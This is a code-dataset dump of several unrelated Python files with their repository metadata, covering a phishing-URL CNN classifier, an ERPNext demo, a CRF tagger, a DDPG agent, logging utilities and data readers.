seq_id
stringlengths
4
11
text
stringlengths
113
2.92M
repo_name
stringlengths
4
125
sub_path
stringlengths
3
214
file_name
stringlengths
3
160
file_ext
stringclasses
18 values
file_size_in_byte
int64
113
2.92M
program_lang
stringclasses
1 value
lang
stringclasses
93 values
doc_type
stringclasses
1 value
stars
int64
0
179k
dataset
stringclasses
3 values
pt
stringclasses
78 values
13058059804
from string import printable from keras.models import Model, load_model from keras import regularizers from keras.layers.core import Dense, Dropout, Lambda from keras.layers import Input, ELU, Embedding, \ BatchNormalization, Convolution1D,concatenate from keras.preprocessing import sequence from keras.optimizers import Adam from keras import backend as K from keras.callbacks import CSVLogger from utils import load_model, save_model from keras.utils.vis_utils import plot_model class CNNC: def __init__(self, max_len=75, emb_dim=32, max_vocab_len=100, w_reg=regularizers.l2(1e-4)): self.max_len = max_len self.csv_logger = CSVLogger('CNN_log.csv', append=True, separator=';') main_input = Input(shape=(max_len,), dtype='int32', name='main_input') # Embedding layer emb = Embedding(input_dim=max_vocab_len, output_dim=emb_dim, input_length=max_len, W_regularizer=w_reg)(main_input) emb = Dropout(0.25)(emb) def sum_1d(X): return K.sum(X, axis=1) def get_conv_layer(emb, kernel_size=5, filters=256): # Conv layer conv = Convolution1D(kernel_size=kernel_size, filters=filters, \ border_mode='same')(emb) conv = ELU()(conv) conv = Lambda(sum_1d, output_shape=(filters,))(conv) # conv = BatchNormalization(mode=0)(conv) conv = Dropout(0.5)(conv) return conv # Multiple Conv Layers # calling custom conv function from above conv1 = get_conv_layer(emb, kernel_size=2, filters=256) conv2 = get_conv_layer(emb, kernel_size=3, filters=256) conv3 = get_conv_layer(emb, kernel_size=4, filters=256) conv4 = get_conv_layer(emb, kernel_size=5, filters=256) # Fully Connected Layers merged = concatenate([conv1, conv2, conv3, conv4], axis=1) hidden1 = Dense(1024)(merged) hidden1 = ELU()(hidden1) hidden1 = BatchNormalization(mode=0)(hidden1) hidden1 = Dropout(0.5)(hidden1) hidden2 = Dense(1024)(hidden1) hidden2 = ELU()(hidden2) hidden2 = BatchNormalization(mode=0)(hidden2) hidden2 = Dropout(0.5)(hidden2) # Output layer (last fully connected layer) output = Dense(1, activation='sigmoid', name='output')(hidden2) # Compile model and define optimizer self.model = Model(input=[main_input], output=[output]) self.adam = Adam(lr=1e-4, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0) self.model.compile(optimizer=self.adam, loss='binary_crossentropy', metrics=['accuracy']) def save_model(self, fileModelJSON, fileWeights): save_model(self.model, fileModelJSON, fileWeights) def load_model(self, fileModelJSON, fileWeights): self.model = load_model(fileModelJSON, fileWeights) self.model.compile(optimizer=self.adam, loss='binary_crossentropy', metrics=['accuracy']) def train_model(self, x_train, target_train, epochs=5, batch_size=32): print("Training CNN model with " + str(epochs) + " epochs and batches of size " + str(batch_size)) self.model.fit(x_train, target_train, epochs=epochs, batch_size=batch_size, verbose=1, callbacks=[self.csv_logger]) def test_model(self, x_test, target_test): print("testing CNN model") return self.model.evaluate(x_test, target_test, verbose=1) def predict(self, x_input): url_int_tokens = [[printable.index(x) + 1 for x in x_input if x in printable]] X = sequence.pad_sequences(url_int_tokens, maxlen=self.max_len) p = self.model.predict(X, batch_size=1) return "benign" if p < 0.5 else "malicious" def export_plot(self): plot_model(self.model, to_file='CNN.png')
larranaga/phishing-url-detection
CNNC.py
CNNC.py
py
3,833
python
en
code
5
github-code
36
75075870824
from __future__ import unicode_literals import frappe from frappe.utils.make_random import add_random_children, get_random, how_many, can_make from frappe.utils import cstr from erpnext.setup.utils import get_exchange_rate from erpnext.accounts.party import get_party_account_currency def run_sales(current_date): if can_make("Opportunity"): for i in xrange(how_many("Opportunity")): make_opportunity(current_date) if can_make("Quotation"): for i in xrange(how_many("Quotation")): make_quotation(current_date) if can_make("Sales Order"): for i in xrange(how_many("Sales Order")): make_sales_order(current_date) def make_opportunity(current_date): b = frappe.get_doc({ "creation": current_date, "doctype": "Opportunity", "enquiry_from": "Customer", "customer": get_random("Customer"), "enquiry_type": "Sales", "transaction_date": current_date, }) add_random_children(b, "items", rows=4, randomize = { "qty": (1, 5), "item_code": ("Item", {"has_variants": "0"}) }, unique="item_code") b.insert() frappe.db.commit() def make_quotation(current_date): # get open opportunites opportunity = get_random("Opportunity", {"status": "Open"}) if opportunity: from erpnext.crm.doctype.opportunity.opportunity import make_quotation qtn = frappe.get_doc(make_quotation(opportunity)) qtn.insert() frappe.db.commit() qtn.submit() frappe.db.commit() else: # make new directly # get customer, currency and exchange_rate customer = get_random("Customer") company_currency = frappe.db.get_value("Company", "Wind Power LLC", "default_currency") party_account_currency = get_party_account_currency("Customer", customer, "Wind Power LLC") if company_currency == party_account_currency: exchange_rate = 1 else: exchange_rate = get_exchange_rate(party_account_currency, company_currency) qtn = frappe.get_doc({ "creation": current_date, "doctype": "Quotation", "quotation_to": "Customer", "customer": customer, "currency": party_account_currency or company_currency, "conversion_rate": exchange_rate, "order_type": "Sales", "transaction_date": current_date, }) add_random_children(qtn, "items", rows=3, randomize = { "qty": (1, 5), "item_code": ("Item", {"has_variants": "0"}) }, unique="item_code") qtn.insert() frappe.db.commit() qtn.submit() frappe.db.commit() def make_sales_order(current_date): q = get_random("Quotation", {"status": "Submitted"}) if q: from erpnext.selling.doctype.quotation.quotation import make_sales_order so = frappe.get_doc(make_sales_order(q)) so.transaction_date = current_date so.delivery_date = frappe.utils.add_days(current_date, 10) so.insert() frappe.db.commit() so.submit() frappe.db.commit()
frappe/erpnext_demo
erpnext_demo/selling.py
selling.py
py
2,758
python
en
code
2
github-code
36
2744395369
# 第一列不能有 4 import pandas as pd import numpy as np TRUTH_PATH = "/Users/luminshen/Documents/代码/PycharmProjects/Research/-GAN-/Table-GAN/tableGAN/data/Adult/Adult.csv" SAVE_PATH = "./data_with_rule_single_rule.csv" def single_cell_rule(): file = pd.read_csv(TRUTH_PATH, sep=',') file = list(np.array(file)) res = [] for row in file: if row[1] == 4: row[1] = 6 res.append(row) res = np.array(res) rsf_out = pd.DataFrame(res) rsf_out.to_csv( "/Users/luminshen/Documents/代码/PycharmProjects/Research/-GAN-/Table-GAN/tableGAN/data/Adult/Adult_rule.csv", index=False, sep=',') print("输出完成!", res.shape) def combine_rule(): file = pd.read_csv(TRUTH_PATH, sep=',') labels = pd.read_csv( "/Users/luminshen/Documents/代码/PycharmProjects/Research/-GAN-/Table-GAN/tableGAN/data/Adult/Adult_labels.csv", sep=',') labels_ = list(np.array(labels)) file = list(np.array(file)) positive = [] labels = [] negative = [] col_1 = 0 col_2 = 9 for (i, _), label in zip(enumerate(file), labels_): is_true = True threshold = 0 for j, _ in enumerate(file): if file[i][col_1] == file[j][col_1] and file[i][col_2] == file[j][col_2]: threshold -= 1 if threshold <= 0: is_true = False negative.append(file[i]) labels.append([1]) break if is_true: positive.append(file[i]) labels.append([0]) # labels.append(label[0]) X = np.array(positive + negative) # X = np.array(positive) y = np.array(labels) X_out = pd.DataFrame(X) y_out = pd.DataFrame(y) X_out.to_csv( "/Users/luminshen/Documents/代码/PycharmProjects/Research/-GAN-/Table-GAN/tableGAN/data/Adult/Adult_rule.csv", index=False, sep=',') y_out.to_csv( "/Users/luminshen/Documents/代码/PycharmProjects/Research/-GAN-/Table-GAN/tableGAN/data/Adult/Adult_rule_labels.csv", index=False, sep=',') # print(res) file_rule = pd.read_csv( "/Users/luminshen/Documents/代码/PycharmProjects/Research/-GAN-/Table-GAN/tableGAN/data/Adult/Adult_rule.csv", sep=',') file = list(np.array(file_rule)) error = 0 for i, _ in enumerate(file): for j, _ in enumerate(file): if j <= i: continue if file[i][col_1] == file[j][col_1] and file[i][col_2] > file[j][col_2]: error += 1 print( "输出完成!X_shape:{}, y_shape:{}, error: {}, error rate:{}".format(X.shape, y.shape, error, error / len(file) ** 2)) # single_cell_rule() combine_rule()
lums199656/Research
rules/去除违反 rules 的数据.py
去除违反 rules 的数据.py
py
2,786
python
en
code
1
github-code
36
25822228264
#!/usr/bin/env python3 # -*- coding: utf-8 -*- def ui_input() -> str: """This function takes player's cards""" return input('Enter all your cards (with spaces): ') def blackjack(cards: str) -> int: """This function counts points""" cards_values = { '2': 2, '3': 3, '4': 4, '5': 5, '6': 6, '7': 7, '8': 8, '9': 9, 'T': 10, 'J': 10, 'Q': 10, 'K': 10 } a_num = 0 points = 0 for card in cards.split(): if card in cards_values: points = points + cards_values[card] elif card == 'A': a_num = a_num + 1 if a_num > 0: for _ in range(a_num): if a_num > 1: points = points + 1 a_num = a_num - 1 else: if points + 11 < 22: points = points + 11 else: points = points + 1 return points def ui_output(points: int) -> None: """This function prints the result""" if points <= 21: print('Your points: ', points) else: print('Bust') ui_output(blackjack(ui_input()))
LiudaShevliuk/python
lab9_1.py
lab9_1.py
py
1,178
python
en
code
0
github-code
36
31062929205
from ..utils import Object class ChatStatisticsMessageSenderInfo(Object): """ Contains statistics about messages sent by a user Attributes: ID (:obj:`str`): ``ChatStatisticsMessageSenderInfo`` Args: user_id (:obj:`int`): User identifier sent_message_count (:obj:`int`): Number of sent messages average_character_count (:obj:`int`): Average number of characters in sent messages; 0 if unknown Returns: ChatStatisticsMessageSenderInfo Raises: :class:`telegram.Error` """ ID = "chatStatisticsMessageSenderInfo" def __init__(self, user_id, sent_message_count, average_character_count, **kwargs): self.user_id = user_id # int self.sent_message_count = sent_message_count # int self.average_character_count = average_character_count # int @staticmethod def read(q: dict, *args) -> "ChatStatisticsMessageSenderInfo": user_id = q.get('user_id') sent_message_count = q.get('sent_message_count') average_character_count = q.get('average_character_count') return ChatStatisticsMessageSenderInfo(user_id, sent_message_count, average_character_count)
iTeam-co/pytglib
pytglib/api/types/chat_statistics_message_sender_info.py
chat_statistics_message_sender_info.py
py
1,244
python
en
code
20
github-code
36
471364125
# Adapted from https://github.com/mimoralea/gdrl from helpers.utils.action_selection import GreedyStrategy, NormalNoiseStrategy from helpers.utils.priority_replay import Memory from helpers.nn.network import FCQV, FCDP from itertools import count import torch.optim as optim import numpy as np import torch import time import glob import os import gc LEAVE_PRINT_EVERY_N_SECS = 300 RESULTS_DIR = os.path.join('..', 'results') ERASE_LINE = '\x1b[2K' class DDPG_agent: def __init__(self, policy_info={}, value_info={}, env_info={}, training_info={}, buffer_info={}): # set device target self.device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu") ### POLICY NETWORK PARAMETERS self.online_policy_model = FCDP(env_info["state_size"], env_info["bounds"], policy_info["hidden_dims"], device=self.device) self.target_policy_model = FCDP(env_info["state_size"], env_info["bounds"], policy_info["hidden_dims"], device=self.device) self.policy_optimizer = optim.Adam(self.online_policy_model.parameters(), lr=policy_info["learning_rate"]) self.policy_max_grad_norm = policy_info["max_grad_norm"] ### VALUE NETWORK PARAMETERS self.online_value_model = FCQV(env_info["state_size"], env_info["action"], value_info["hidden_dims"], device=self.device) self.target_value_model = FCQV(env_info["state_size"], env_info["action"], value_info["hidden_dims"], device=self.device) self.value_optimizer = optim.Adam(self.online_value_model.parameters(), lr=value_info["learning_rate"]) self.value_max_grad_norm = value_info["max_grad_norm"] # TRAINING AND EVALUATION STRATEGY self.training_strategy = NormalNoiseStrategy(env_info["bounds"], training_info["exploration_noise_ratio"]) self.update_target_every_steps = training_info["update_every_step"] self.evaluation_strategy = GreedyStrategy(env_info["bounds"]) self.n_warmup_batches = training_info["n_warmup_batches"] self.soft_weight_tau = training_info.get("weight_mix_ratio", None) # MEMORY INITIALIZATION self.replay_buffer = Memory(capacity=buffer_info["size"], seed=training_info["seed"]) self.batch_size = buffer_info["batch_size"] # seed torch.manual_seed(training_info["seed"]); self.rand_generator = np.random.RandomState(training_info["seed"]) # lower and upper action value bounds self.low_bounds, self.high_bounds = env_info["bounds"] def prepopulate(self, brain_name, env): """ First thing called after environment has been setup To aviod the empty memory problem we randomly pre populate the memory. This is done by taking random actions and storing them as experiences Args: brain_name: (string) name of agent we are using env: (object) Environment we are operating in """ # flag for when to reset the environment [when we hit a terminal state] reset_check, last_state = False, None for idx in range(self.replay_buffer.tree.capacity): # if idx is the first step get state or we have to reset if idx == 0 or reset_check: # change reset check back to false reset_check = False # resent environment and extract current state env_info = env.reset(train_mode=True)[brain_name] last_state = env_info.vector_observations[0] # take random actions within acceptable bounds action = self.rand_generator.uniform(low=self.low_bounds, high=self.high_bounds, size=len(self.high_bounds)) # take the action, recod reward, and terminal status env_info = env.step(action)[brain_name] reward = env_info.rewards[0] done = env_info.local_done[0] # checking status if done: # set reset flag reset_check = True state = np.zeros(last_state.shape) # store in replay self.replay_buffer.store(last_state, action, reward, state, done) else: # get next state from the environment state = env_info.vector_observations[0] # store in replay self.replay_buffer.store(last_state, action, reward, state, done) # update state last_state = state def update_networks(self, tau=0.1): tau = self.soft_weight_tau if self.soft_weight_tau is not None else tau # copy value model for target, online in zip(self.target_value_model.parameters(), self.online_value_model.parameters()): target_ratio = (1.0 - tau) * target.data online_ratio = tau * online.data mixed_weights = target_ratio + online_ratio target.data.copy_(mixed_weights) # copy policy model for target, online in zip(self.target_policy_model.parameters(), self.online_policy_model.parameters()): target_ratio = (1.0 - tau) * target.data online_ratio = tau * online.data mixed_weights = target_ratio + online_ratio target.data.copy_(mixed_weights) def load(self, states, actions, rewards, next_states, is_terminals): # convert to torch tensors states = torch.from_numpy(states).float().to(self.device) actions = torch.from_numpy(actions).float().to(self.device) next_states = torch.from_numpy(next_states).float().to(self.device) rewards = torch.from_numpy(rewards).float().to(self.device) is_terminals = torch.from_numpy(is_terminals).float().to(self.device) # returns tensors return states, actions, rewards, next_states, is_terminals def optimize_model(self): # priotized replay used so we can update optimize on the go: we get the batch indexes, memory, # importance sampling idx_batch, memory_batch, ISweights = self.replay_buffer.sample_per(self.batch_size) # convert sampling weights to tensor ISweights = torch.from_numpy(ISweights).float().to(self.device) # unwrap states, actions, rewards, next_states, is_terminals = self.replay_buffer.unwrap_experiences(memory_batch) # convert to torch states, actions, rewards, next_states, is_terminals = self.load(states, actions, rewards, next_states, is_terminals) ## Target policy # get maximum policy over all states argmax_a_q_sp = self.target_policy_model(next_states) # calculate the q values corresponding to the policy above max_a_q_sp = self.target_value_model(next_states, argmax_a_q_sp) # calculate the TD target q_state action values target_q_sa = rewards + self.gamma * max_a_q_sp * (1 - is_terminals) ## Online value # for each state action pair we calculate the q_values q_sa = self.online_value_model(states, actions) ## Loss calculations td_error_loss = q_sa - target_q_sa.detach() # calculate absolute error: convert to numpy abs_error = torch.abs(td_error_loss).cpu().detach().numpy() # update PER self.replay_buffer.batch_update(idx_batch, abs_error.squeeze()) # calculate value loss using weight mean square error value_loss = (ISweights * td_error_loss).mul(0.5).pow(2).mean() # zero optimizer, do a backward pass, clip gradients, and finally optimizer self.value_optimizer.zero_grad() value_loss.backward() torch.nn.utils.clip_grad_norm_(self.online_value_model.parameters(), self.value_max_grad_norm) self.value_optimizer.step() ## ONLINE POLICY argmax_a_q_s = self.online_policy_model(states) max_a_q_s = self.online_value_model(states, argmax_a_q_s) ## calculate loss using weighted mean policy_loss = -(ISweights * max_a_q_s).mean() self.policy_optimizer.zero_grad() policy_loss.backward() torch.nn.utils.clip_grad_norm_(self.online_policy_model.parameters(), self.policy_max_grad_norm) self.policy_optimizer.step() def interaction_step(self, last_state, env, brain_name): # initially we randomly explore the sample space check = self.replay_buffer.current_storage_size < self.n_warmup_batches * self.batch_size action = self.training_strategy.select_action(self.online_policy_model, last_state, check) # get environment values env_info = env.step(action)[brain_name] state = env_info.vector_observations[0] reward = env_info.rewards[0] done = env_info.local_done[0] # store into replay buffer self.replay_buffer.store(last_state, action, reward, state, done) # update tracking parameters self.episode_reward[-1] += reward self.episode_timestep[-1] += 1 self.episode_exploration[-1] += self.training_strategy.ratio_noise_injected # return values return state, done def train(self, env, brain_name, gamma, max_minutes, max_episodes, goal_mean_100_reward): # initialize tracking parameters self.episode_timestep = [] self.episode_reward = [] self.episode_seconds = [] self.evaluation_scores = [] self.episode_exploration = [] self.gamma = gamma # loop parameters total_steps = 0 training_time = 0 training_start, last_debug_time = time.time(), float("-inf") # storage for results results = np.empty((max_episodes, 5)) results[:] = np.nan # start training loop for episode in range(1, max_episodes + 1): # episode start tick episode_start = time.time() # refresh environment state = env.reset(train_mode=True)[brain_name].vector_observations[0] is_terminal = False self.episode_reward.append(0.0) self.episode_timestep.append(0.0) self.episode_exploration.append(0.0) for step in count(): state, is_terminal = self.interaction_step(state, env, brain_name) # after making random steps check = self.replay_buffer.current_storage_size > (self.n_warmup_batches * self.batch_size) if check: # run optimization self.optimize_model() # updates every episode if np.sum(self.episode_timestep) % self.update_target_every_steps == 0: self.update_networks() if is_terminal: gc.collect() break # stat tracking episode_elapsed = time.time() - episode_start self.episode_seconds.append(episode_elapsed) training_time += episode_elapsed evaluation_score, _ = self.evaluate(self.online_policy_model, env, brain_name) self.save_checkpoint(episode - 1, self.online_policy_model) total_steps = int(np.sum(self.episode_timestep)) self.evaluation_scores.append(evaluation_score) # mean and std calculations mean_10_reward = np.mean(self.episode_reward[-10:]) std_10_reward = np.std(self.episode_reward[-10:]) mean_100_reward = np.mean(self.episode_reward[-100:]) std_100_reward = np.std(self.episode_reward[-100:]) mean_100_eval_score = np.mean(self.evaluation_scores[-100:]) std_100_eval_score = np.std(self.evaluation_scores[-100:]) lst_100_exp_rat = np.array(self.episode_exploration[-100:]) / np.array(self.episode_timestep[-100:]) mean_100_exp_rat = np.mean(lst_100_exp_rat) std_100_exp_rat = np.std(lst_100_exp_rat) wallclock_elapsed = time.time() - training_start results[episode - 1] = total_steps, mean_100_reward, mean_100_eval_score, \ training_time, wallclock_elapsed reached_debug_time = time.time() - last_debug_time >= LEAVE_PRINT_EVERY_N_SECS # termination criteria check reached_max_minutes = wallclock_elapsed >= max_minutes * 60 reached_max_episodes = episode >= max_episodes reached_goal_mean_reward = mean_100_eval_score >= goal_mean_100_reward training_over = reached_max_minutes or reached_max_episodes or reached_goal_mean_reward # message string elapsed_str = time.strftime("%H:%M:%S", time.gmtime(time.time() - training_start)) debug_message = 'el {}, ep {:04}, ts {:07}, ' debug_message += 'ar_10 ts {:05.1f} \u00B1 {:05.1f}, ' debug_message += 'ar_100 ts {:05.1f} \u00B1 {:05.1f}, ' debug_message += 'ex 100 {:02.1f} \u00B1 {:02.1f}, ' debug_message += 'ev {:05.1f} \u00B1 {:05.1f}' debug_message = debug_message.format(elapsed_str, episode - 1, total_steps, mean_10_reward, std_10_reward, mean_100_reward, std_100_reward, mean_100_exp_rat, std_100_exp_rat, mean_100_eval_score, std_100_eval_score) print(debug_message, flush=True) if reached_debug_time or training_over: print("Debug Message") print(debug_message, flush=True) last_debug_time = time.time() if training_over: if reached_max_minutes: print(u'--> reached_max_minutes \u2715') if reached_max_episodes: print(u'--> reached_max_episodes \u2715') if reached_goal_mean_reward: print(u'--> reached_goal_mean_reward \u2713') break # get score for last round final_eval_score, score_std = self.evaluate(self.online_policy_model, env, brain_name, n_episodes=100) wallclock_time = time.time() - training_start print("Training complete.") print('Final evaluation score {:.2f}\u00B1{:.2f} in {:.2f}s training time,' ' {:.2f}s wall-clock time.\n'.format( final_eval_score, score_std, training_time, wallclock_time)) # close and delete the environment env.close() ; del env self.get_cleaned_checkpoints() return results, final_eval_score, training_time, wallclock_time def evaluate(self, eval_policy_model, eval_env, brain_name, n_episodes=1): rs = [] for _ in range(n_episodes): env_info = eval_env.reset(train_mode=True)[brain_name] state, done = env_info.vector_observations[0], False rs.append(0) for _ in count(): action = self.evaluation_strategy.select_action(eval_policy_model, state) env_info = eval_env.step(action)[brain_name] state = env_info.vector_observations[0] reward = env_info.rewards[0] done = env_info.local_done[0] rs[-1] += reward if done: break # return mean and standard deviation return np.mean(rs), np.std(rs) def save_checkpoint(self, episode_idx, model): torch.save(model.state_dict(), os.path.join("results", "checkpoint_models", 'model.{}.tar'.format(episode_idx))) def get_cleaned_checkpoints(self, n_checkpoints=4): try: return self.checkpoint_paths except AttributeError: self.checkpoint_paths = {} paths = glob.glob(os.path.join("results", "checkpoint_models", '*.tar')) paths_dic = {int(path.split('.')[-2]): path for path in paths} last_ep = max(paths_dic.keys()) checkpoint_idxs = np.linspace(1, last_ep + 1, n_checkpoints, endpoint=True, dtype=np.int) - 1 for idx, path in paths_dic.items(): if idx in checkpoint_idxs: self.checkpoint_paths[idx] = path else: os.unlink(path)
Oreoluwa-Se/Continuous-Control
helpers/agent.py
agent.py
py
16,852
python
en
code
0
github-code
36
6245629363
# -*- coding: utf-8 -*- from setuptools import setup, find_packages from setuptools.command.test import test as TestCommand class PyTest(TestCommand): ptest_args = [] def initialize_options(self): TestCommand.initialize_options(self) self.pytest_args = [] def run(self): import pytest pytest.main(self.pytest_args) setup( name='PyIEProxy', version='0.1.0', description='Python IE Proxy Switch', url='https://github.com/magichan-lab/pyieproxy', author='Magichan', author_email='magichan.lab@gmail.com', maintainer='Magichan', maintainer_email='magichan.lab@gmail.com', license='MIT', packages=find_packages(exclude=["*.tests"]), install_requires=['wheel', 'requests'], zip_safe=False, entry_points={ 'console_scripts': [ 'ie-proxy = bin.command:main', ]}, extras_require={ 'test': ['pytest-cov', 'pytest-pep8', 'coverage', 'pep8', 'pytest'], 'docs': ['sphinx'], }, cmdclass={'test': PyTest}, )
magichan-lab/PyIEProxy
setup.py
setup.py
py
1,119
python
en
code
0
github-code
36
33675586325
#!/usr/bin/env python # coding: utf-8 # In[44]: import re import pickle from sklearn_crfsuite import CRF from sklearn_crfsuite import metrics from sklearn_crfsuite import scorers # In[45]: def parse(input_): tags = [] lexicons = [] lemma = [] pos= [] sentences = input_.split("\n\n") for sentence in sentences: words = sentence.split("\n") for word in words: tokens = word.split("\t") tags.append(tokens[7]) lexicons.append(tokens[1]) pos.append(tokens[4]) lemma.append(tokens[2]) lexicons.append("</s>") tags.append("</s>") lemma.append("</s>") pos.append("</s>") lexicons.pop() return lexicons, tags, pos, lemma # In[46]: def features(sentence, index, pos_sentence): # print(sentence[index], pos_sentence[index]) ### sentence is of the form [w1,w2,w3,..], index is the position of the word in the sentence return { 'word':sentence[index], 'is_first_word': int(index==0), 'is_last_word':int(index==len(sentence)-1), 'prev_word':'' if index==0 else sentence[index-1], 'next_word':'' if index==len(sentence)-1 else sentence[index+1], 'prev_pre_word':'' if index==0 or index==1 else sentence[index-2], 'next_next_word':'' if index==len(sentence)-1 or index==len(sentence)-2 else sentence[index+2], 'is_numeric':int(sentence[index].isdigit()), 'is_alphanumeric': int(bool((re.match('^(?=.*[0-9]$)(?=.*[a-zA-Z])',sentence[index])))), 'pos': pos_sentence[index] } # In[47]: def prepareData(input): lexicons, tags, pos, lemma = parse(input) # print(len(lexicons)) sentences = ' '.join(lexicons).split(' </s> ') sentences_pos = ' '.join(pos).split(' </s> ') sentences_tags = ' '.join(tags).split(' </s> ') # print(len(sentences)) X=[] y=[] for sentenceid, sentence in enumerate(sentences): words = sentence.split(' ') pos = sentences_pos[sentenceid].split(' ') X.append([features(words, index, pos) for index in range(len(words))]) for sentence_tag in sentences_tags: words_tag = sentence.split(' ') y.append(words_tag) return X, y # POS, Chunck, Lemma, Case Marking # In[48]: def train_CRF(X_train,y_train): crf = CRF( algorithm='lbfgs', c1=0.01, c2=0.1, max_iterations=100, all_possible_transitions=True ) crf.fit(X_train, y_train) pickle.dump(crf, open("./annCorra_crf_pos_model", 'wb')) # In[49]: # print(X_train[0]) # print(y_train) # In[50]: def test_dev_data(X_test,y_test): y_pred=crf.predict(X_test) print("F1 score on Test Data ") print(metrics.flat_f1_score(y_test, y_pred,average='weighted',labels=crf.classes_)) print("F score on Training Data ") y_pred_train=crf.predict(X_train) metrics.flat_f1_score(y_train, y_pred_train,average='weighted',labels=crf.classes_) ### Look at class wise score print(metrics.flat_classification_report( y_test, y_pred, labels=crf.classes_, digits=3 )) # In[51]: train_file = open('./final_train.txt', 'r', encoding="utf-8") traininput = train_file.read() # dev_file = open('./final_dev.txt', 'r', encoding="utf-8") # devinput = dev_file.read() # In[52]: X_train,y_train = prepareData(traininput) # In[53]: train_CRF(X_train, y_train) # In[54]: # X_test,y_test = prepareData(devinput) # In[32]: # test_dev_data(X_test, y_test) # In[ ]: # In[ ]:
hellomasaya/linguistics-data
assgn4/annCorraCRFModel.py
annCorraCRFModel.py
py
3,577
python
en
code
0
github-code
36
28801077672
# -*- coding: utf-8 -*- """ Created on Thu Feb 1 09:03:59 2018 @author: a001985 """ import logging import pathlib #========================================================================== def add_log(log_id=None, log_directory=None, log_level='DEBUG', on_screen=True, prefix='log_ekostat'): """ log_id: Id of the logger. Typically a UUID log_directory: Directory to put the log files in. If not given no files are created. log_level: Specify the log level. on_screen: Set to True if you want to print to screen as well. Default is True. prefix: Prefix to be added to the files. -------------------------------------------------------------- Usage: self._logger = logging.getLogger('......') self._logger.debug('Debug message.') self._logger.info('Info message.') self._logger.warning('Warning message.') self._logger.error('Error message.') try: ... except Exception as e: self._logger.error('Exception: ' + str(e)) """ # logging_format = '%(asctime)s\t%(filename)s\t%(funcName)s\t%(levelname)-10s : %(message)s' logging_format = '%(asctime)s\t%(filename)s\t%(lineno)d\t%(funcName)s\t%(levelname)s\t%(message)s' log_id_ext = '{}_{}'.format(prefix, log_id) log = logging.getLogger(log_id_ext) # Dont add an excisting logger if len(log.handlers): return False print('='*100) print(log_id) print(log_directory) print(prefix) print('-'*100) # Set debug log_level level_mapping = {'DEBUG': logging.DEBUG, 'INFO': logging.INFO, 'WARNING': logging.WARNING, 'ERROR': logging.ERROR} log_level = level_mapping.get(log_level.upper(), 'ERROR') log.setLevel(log_level) if log_directory: dir_path = pathlib.Path(log_directory) log_path = pathlib.Path(dir_path, '{}_{}.log'.format(prefix, log_id)) # Log directories. if not dir_path.exists(): dir_path.mkdir(parents=True) # Define rotation log files for internal log files. try: log_handler = logging.handlers.RotatingFileHandler(str(log_path), maxBytes = 128*1024, backupCount = 10) log_handler.setFormatter(logging.Formatter(logging_format)) log_handler.setLevel(log_level) log.addHandler(log_handler) except Exception as e: print('EKOSTAT logging: Failed to set up file logging: ' + str(e)) if on_screen: try: log_handler_screen = logging.StreamHandler() log_handler_screen.setFormatter(logging.Formatter(logging_format)) log_handler_screen.setLevel(log_level) log.addHandler(log_handler_screen) except Exception as e: print('EKOSTAT logging: Failed to set up screen logging: ' + str(e)) log.debug('') log.debug('='*120) log.debug('### Log added for log_id "{}" at locaton: {}'.format(log_id, str(log_path))) log.debug('-'*120) return True #========================================================================== def get_log(log_id): """ Return a logging object set to the given id. """ # print('¤'*100) # print('¤'*100) # print('¤'*100) # print(logging.Logger.manager.loggerDict.keys()) # print('¤'*100) for item in logging.Logger.manager.loggerDict.keys(): # print('{} _ {}'.format(log_id, item)) if log_id in item: log_id = item break return logging.getLogger(log_id)
ekostat/ekostat_calculator
core/logger.py
logger.py
py
3,803
python
en
code
1
github-code
36
72573548584
import torch import torchaudio import glob from torch.utils.data import Dataset from utils.signal_processing import get_rnd_audio,extract_label_bat from pandas import read_csv from os import path class raw_audio_dataset(Dataset): def __init__(self,wav_dir, annotation_file, input_size, transform=None, target_transform=None): """ Initialises the audio dataset """ self.audio_files = read_csv(annotation_file)['File name'] self.label = read_csv(annotation_file) self.transform = transform self.target_transform = target_transform self.input_size = input_size self.wav_dir = wav_dir def __len__(self): """ Returns the length of the dataset """ return len(self.audio_files) def __getitem__(self,idx): audio_path = path.join(self.wav_dir,self.audio_files[idx]) # .iloc[idx, 0] to get the correct audio_path audio,b,e = get_rnd_audio(audio_path,self.input_size) # already a tensor label = extract_label_bat(self.label.iloc[idx],b,e) if self.transform: audio = self.transform(audio) # which audio transforms are usually used? if self.target_transform: label = self.target_transform(label) return audio,label
ArthurZucker/PAMAI
datasets/raw_audio_dataset.py
raw_audio_dataset.py
py
1,409
python
en
code
5
github-code
36
36121229353
import os from typing import Any, Iterator, Dict, Set from forte.data.data_pack import DataPack from forte.data.data_utils_io import dataset_path_iterator from forte.data.base_reader import PackReader from ft.onto.base_ontology import Document __all__ = [ "PlainTextReader", ] class PlainTextReader(PackReader): r""":class:`PlainTextReader` is designed to read in plain text dataset.""" def _collect(self, text_directory) -> Iterator[Any]: r"""Should be called with param ``text_directory`` which is a path to a folder containing txt files. Args: text_directory: text directory containing the files. Returns: Iterator over paths to .txt files """ return dataset_path_iterator(text_directory, self.configs.file_ext) def _cache_key_function(self, text_file: str) -> str: return os.path.basename(text_file) # pylint: disable=unused-argument def text_replace_operation(self, text: str): return [] def _parse_pack(self, file_path: str) -> Iterator[DataPack]: pack = DataPack() with open(file_path, "r", encoding="utf8", errors="ignore") as file: text = file.read() pack.set_text(text, replace_func=self.text_replace_operation) Document(pack, 0, len(pack.text)) pack.pack_name = file_path yield pack @classmethod def default_configs(cls): return {"file_ext": ".txt"} def record(self, record_meta: Dict[str, Set[str]]): r"""Method to add output type record of `PlainTextReader` which is `ft.onto.base_ontology.Document` with an empty set to :attr:`forte.data.data_pack.Meta.record`. Args: record_meta: the field in the datapack for type record that need to fill in for consistency checking. """ record_meta["ft.onto.base_ontology.Document"] = set()
asyml/forte
forte/data/readers/plaintext_reader.py
plaintext_reader.py
py
1,931
python
en
code
230
github-code
36
7045186193
